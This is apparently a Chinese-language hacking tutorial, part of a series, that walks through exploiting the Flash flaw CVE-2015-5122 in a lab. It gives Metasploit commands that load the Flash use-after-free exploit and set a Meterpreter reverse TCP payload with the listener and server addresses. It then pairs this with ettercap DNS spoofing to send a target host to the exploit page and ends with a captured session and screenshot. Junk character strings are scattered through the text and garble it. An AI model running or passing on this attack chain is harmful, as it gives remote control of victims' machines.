|
. J0 n: q; B y% M0 T
二、cve2015-5122漏洞实例演示虚拟机 # y8 \; n4 E* X) P) r! t, y$ l+ w
/ g$ [. y; R, U9 A5 t `! N0 d
3 d. V9 H' U: O! R& H
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: : B Z! t5 i4 P) ~- B# X& `; ^) t
. D, S: H. z, W/ P
8 M4 b: N L9 R* Y search cve-2015-5122如图: % Z# g4 G/ G/ w5 F
; w8 J: P! Y3 t% d; [8 K- F1 w+ Z
- u( Y2 w1 T. S1 M# M
: O! W5 U U$ N3 P% R9 P: r7 _
8 s$ B3 B" n3 e# M7 G5 z. |+ ~
. b% k, ]% N( d" j$ ^, ?. u 下面我们敲如下命令:
+ N. i0 ~: }' M8 `% ?8 x }) t9 }1 j) X ' n! G, I' E! b9 S# O9 A
k: m' W. U5 C' ?: ~3 S
use exploit/multi/browser/adobe_flash_opaque_background_uaf $ K( s9 ~% ], e' K k
8 [4 I9 e6 T' K! t) L. R6 N; w' F* m* |
set PAYLOAD windows/meterpreter/reverse_tcp
. T+ f5 z* T& k* O ' X1 \3 _' Y- L& a
0 @ [2 P/ {( @% T3 O5 S$ Q# _ set LHOST 192.168.0.109 * Z1 P- f5 C: H. E
. k7 ?) i6 ]* ~$ q
. s5 @" I0 G9 u; L- Z set URIPATH / /*根目录*/
+ h2 h* M" x: q1 A$ |5 A
. {- J/ L2 H4 ?. z0 z& F# u, B% ^( J. n2 I |3 ^0 A
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
9 b% m: V: E1 o* t2 L$ q 1 T4 G& p0 ^$ \9 y
: ?/ D6 P- ~- {: F# G C set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
' k/ M9 e- g/ }: G
7 m* Z% [. v' P- U' s1 ^9 C9 _" d7 r% G* F5 Q% F2 ^$ f
然后show options如图: : F h4 m0 U4 g( |
- g- y6 l+ F7 G/ [# Q5 t& G, g7 `, c% S& h- l; `, ?1 a
/ x; \8 S: x9 k. @7 L. `
% @, h+ I0 t+ z" U' C0 H4 B4 L; K! [
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: " j9 p1 s4 { g! B* v: ^
7 {# G8 a: Z1 L2 F! A' O6 Y6 b % @ o: P6 B' w
1 F8 q# ]+ t3 O% I: m& g B 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
8 l' `4 ?6 W/ e: S$ J5 P/ N I. A" z: y7 y5 s
. i5 ]4 \- _ ^# ^9 s I
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
# N5 C4 o3 T. i9 |- Q5 a% q i % i* ?1 E7 I) V9 _
1 S2 i G7 \; d$ y
- f4 u7 B9 M8 k8 F+ @/ T
9 u! K6 K' p5 e0 n) f% m6 g& Z" W; {% X3 d2 F
成功了,这时候我们断开ettercap,如图: ) Y5 Z6 P$ P2 ?/ p1 E
1 e* G$ ]4 H1 ]1 Y: x$ l4 L
2 {/ A" \3 [ q1 s6 e
% B+ y- m* d4 w* B
7 P4 ~# B3 c, O
/ Y/ Q' h5 A) x1 e4 y! h$ e# E; W Screenshot如图: : n! T4 n, I7 i8 F2 g" _
5 Z7 E3 @# Q* J# x1 l
$ e" H q8 h5 F2 m. X
0 R" m' C& ?) F z1 M$ y$ E: e " x, F+ W, D2 a, y
% q6 ~* u9 u) d( G& X
8 v/ r e: T% a9 s0 }$ X |